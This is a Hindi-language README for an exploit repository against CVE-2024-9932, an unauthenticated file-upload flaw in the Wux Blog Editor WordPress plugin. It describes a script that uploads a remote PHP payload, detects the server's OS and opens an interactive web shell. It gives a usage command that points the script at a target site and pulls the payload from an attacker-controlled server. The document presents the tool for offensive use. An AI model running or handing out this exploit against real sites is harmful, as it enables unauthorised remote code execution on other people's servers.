
CVE-2024-9932 के लिए बिना प्रमाणीकरण वाला 0-क्लिक RCE एक्सप्लॉइट। यह Wux Blog Editor WordPress प्लगइन में मनमाना फ़ाइल अपलोड भेद्यता का फायदा उठाकर एक रिमोट PHP पेलोड अपलोड करता है, लक्षित ऑपरेटिंग सिस्टम का पता लगाता है, और एक इंटरैक्टिव वेब शेल के माध्यम से रिमोट कमांड निष्पादन प्राप्त करता है।

यह रिपॉज़िटरी CVE-2024-9932 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट है, जो Wux Blog Editor WordPress प्लगइन में एक बिना प्रमाणीकरण वाली मनमानी फ़ाइल अपलोड भेद्यता है, जिससे रिमोट कमांड निष्पादन (RCE) होता है।
स्क्रिप्ट एक असुरक्षित REST एंडपॉइंट का दुरुपयोग करके बिना प्रमाणीकरण के एक रिमोट PHP पेलोड अपलोड करती है। अपलोड होने के बाद, यह अंतिम फ़ाइल स्थान का पुनर्निर्माण करती है, लक्षित ऑपरेटिंग सिस्टम का पता लगाती है, और कमांड निष्पादन के लिए एक इंटरैक्टिव रिमोट शेल प्रदान करती है।
python CVE-2024-9932.py --target http://target-wordpress-site --payload http://attacker-server/cmd.php --payload_name cmd.php
निष्पादन के बाद, स्क्रिप्ट पेलोड अपलोड करती है, उसकी पहुँच की पुष्टि करती है, OS का पता लगाती है, और एक इंटरैक्टिव शेल में प्रवेश करती है।